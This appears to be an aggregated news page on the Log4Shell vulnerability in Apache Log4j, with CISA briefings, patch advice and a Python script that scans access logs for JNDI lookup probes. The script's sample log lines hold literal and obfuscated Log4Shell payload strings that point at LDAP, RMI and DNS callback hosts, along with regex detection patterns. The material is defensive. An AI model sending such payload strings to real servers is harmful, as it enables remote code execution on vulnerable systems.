Log4Shell: A new fix, details of active attacks, and risk mitigation recommendations

Due to the extraordinary widespread use of the open-source Apache Log4j library, the saga of the Log4Shell (CVE-2021-44228) vulnerability is nowhere near finished. As Dr. Johannes Ullrich, Dean of Research at the SANS Technology Institute, recently not…

CISA probes scope, potential fallout of Log4j vulnerability

A top government cyber official said Tuesday that the Cybersecurity and Infrastructure Security Agency hasn’t seen hackers compromise federal agencies by exploiting the Apache Log4j vulnerability — but the agency’s still fearful of widespread attacks stemming from it. Most of all, CISA’s Eric Goldstein said during a phone call Tuesday evening, the government is eager for help from the public in assembling a comprehensive list of all the products that might be susceptible to hackers using the vulnerability, known as Log4Shell in the widely deployed logging library, which the agency expects could affect hundreds of millions of devices or more. CISA and private sector cybersecurity investigators have struck exceptionally dire notes about the potential fallout that have not, as of yet, come to fruition. It’s that unknown potential, however, that has prompted CISA to try to get organizations to patch their systems and take other steps to secure them. “Certainly […]

The post CISA probes scope, potential fallout of Log4j vulnerability appeared first on CyberScoop.


CISA warns ‘most serious’ Log4j vulnerability likely to affect hundreds of millions of devices

Cybersecurity and Infrastructure Security Agency Director Jen Easterly told industry leaders in a phone briefing Monday that a vulnerability in a widely-used logging library “is one of the most serious I’ve seen in my entire career, if not the most serious.” “We expect the vulnerability to be widely exploited by sophisticated actors and we have limited time to take necessary steps in order to reduce the likelihood of damage,” she said of the Apache Log4j flaw. The issue is an unauthenticated remote code execution vulnerability that could allow an intruder to take over an affected device. Hundreds of millions of devices are likely to be affected, said Jay Gazlay of CISA’s vulnerability management office in the call with critical infrastructure owners and operators. CISA, a component of the Department of Homeland Security, is setting up a dedicated website as soon as Tuesday to provide information and counter “active disinformation,” said Eric […]

The post CISA warns ‘most serious’ Log4j vulnerability likely to affect hundreds of millions of devices appeared first on CyberScoop.


CISA to brief critical infrastructure companies about urgent new Log4j vulnerability

The Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency will host a call with critical infrastructure stakeholders Monday afternoon about a critical vulnerability affecting products with the Log4j software library, according to a statement. CISA sent out an alert Friday that the agency had added the flaw to its list of exploited vulnerabilities, and urged federal and civilian organizations to patch and take steps to mitigate harm immediately. Log4j is a widely-used open-source logging tool popular in numerous cloud and enterprise apps including Minecraft, Apple iCloud, Cloudflare and Twitter, making the extent of the zero-day’s potential damage likely wide-reaching. “CISA is working closely with our public and private sector partners to proactively address a critical vulnerability affecting products containing the log4j software library,” CISA director Jen Easterly said in a statement. “This vulnerability, which is being widely exploited by a growing set of threat actors, presents an urgent challenge to network defenders given its broad use.” Cybersecurity researchers noted over the weekend that […]

The post CISA to brief critical infrastructure companies about urgent new Log4j vulnerability appeared first on CyberScoop.


Log4Shell update: Attack surface, attacks in the wild, mitigation and remediation

Several days have passed since the dramatic reveal of CVE-2021-44228 (aka Log4Shell), an easily exploitable (without authentication) RCE flaw in Apache Log4j, a popular open-source Java-based logging utility that’s seemingly used by most enterpri…
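The in-the-wild attacks these items describe arrive as `${jndi:...}` lookup strings planted in any field the application logs (User-Agent, URL paths, form fields), and attackers obfuscate them with nested Log4j lookups to slip past naive string matching. The following is an added example written for this page, not code from any of the linked articles or from the Apache project: it normalizes the common obfuscation forms (`${lower:x}`, `${upper:x}`, `${::-x}`, `${env:NAME:-x}`) the way Log4j itself would resolve them, then flags resolved JNDI lookups and extracts the attacker's callback host so it can be blocked at egress. The access-log lines are constructed for the example; the IP addresses are documentation ranges, not real infrastructure. The normalizer covers only the transforms listed, so any `${` that survives normalization in an attacker-controlled field is still reported and should be reviewed by hand.

```python
import re

# Constructed sample web-server access-log lines (not real traffic): the last
# field is the User-Agent header, a common injection point for Log4Shell probes.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2021:21:03:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"
203.0.113.9 - - [10/Dec/2021:21:05:44 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "${${lower:j}${lower:n}${lower:d}i:${lower:l}dap://198.51.100.7:1389/b}"
203.0.113.12 - - [10/Dec/2021:21:07:02 +0000] "GET /api HTTP/1.1" 200 88 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.8:1099/c}"
198.51.100.20 - - [10/Dec/2021:21:08:10 +0000] "GET /login HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.13 - - [10/Dec/2021:21:09:55 +0000] "GET /x HTTP/1.1" 404 0 "-" "${${env:NO_SUCH:-j}ndi:dns://198.51.100.9/d}"
"""

# Innermost ${...} lookup: no nested '$', '{' or '}' inside it.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A resolved JNDI lookup: ${jndi:<scheme>://<host[:port]>...  (Log4j treats the
# lookup name case-insensitively, so "JNDI" must match too.)
JNDI_LOOKUP = re.compile(r"\$\{jndi:(\w+)://([^/}\s]+)", re.IGNORECASE)


def _resolve(inner: str):
    """Evaluate one innermost lookup the way attackers rely on Log4j doing.

    Handles the obfuscation forms this example assumes are in use:
    ${lower:x} / ${upper:x} case transforms, and ${name:-default}, where an
    empty or unknown name (e.g. ${::-j}, ${env:NO_SUCH:-j}) collapses to the
    default value.  Returns None for anything else so it is left untouched.
    """
    head = inner.lower()
    if head.startswith("lower:"):
        return inner[6:].lower()
    if head.startswith("upper:"):
        return inner[6:].upper()
    if ":-" in inner:
        return inner.split(":-", 1)[1]
    return None


def normalize(text: str, max_rounds: int = 50) -> str:
    """Repeatedly collapse innermost lookups until nothing changes."""
    for _ in range(max_rounds):
        changed = False

        def repl(match):
            nonlocal changed
            value = _resolve(match.group(1))
            if value is None:
                return match.group(0)
            changed = True
            return value

        text = INNER_LOOKUP.sub(repl, text)
        if not changed:
            break
    return text


def scan(log_text: str) -> list:
    """Return one finding per log line that carries a Log4j lookup.

    proto/callback are filled in when the normalized line contains a JNDI
    lookup; lines with other unresolved ${...} still produce a finding with
    proto None so they are not silently dropped.
    """
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        if "${" not in line:
            continue
        normalized = normalize(line)
        match = JNDI_LOOKUP.search(normalized)
        findings.append({
            "line": lineno,
            "src": line.split(" ", 1)[0],
            "proto": match.group(1).lower() if match else None,
            "callback": match.group(2) if match else None,
            "obfuscated": normalized != line,
        })
    return findings


def callback_hosts(findings) -> set:
    """Distinct attacker callback endpoints, e.g. for an egress blocklist."""
    return {f["callback"] for f in findings if f["callback"]}


if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for finding in results:
        print(finding)
    print("callbacks:", sorted(callback_hosts(results)))
```

Run against real access, application or proxy logs, the `callback` values are the hosts the vulnerable JVM would reach out to for the second stage, which is also why blocking outbound LDAP, RMI and DNS from application servers blunts exploitation even before the library is upgraded. The scanner is deliberately noisy: a hit on an unresolved `${...}` with `proto` None may be a new obfuscation this normalizer does not handle, not a false positive.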

Hackers actively exploiting 0-day in Ubiquitous Apache Log4j tool

By Waqas
Apache has released Log4j version 2.15.0 to address the RCE vulnerability and users are urged to apply the update ASAP. (2.15.0 was the first fix and was later superseded by further 2.x releases, so the target should be the current Log4j release rather than 2.15.0 specifically.)
This is a post from HackRead.com.
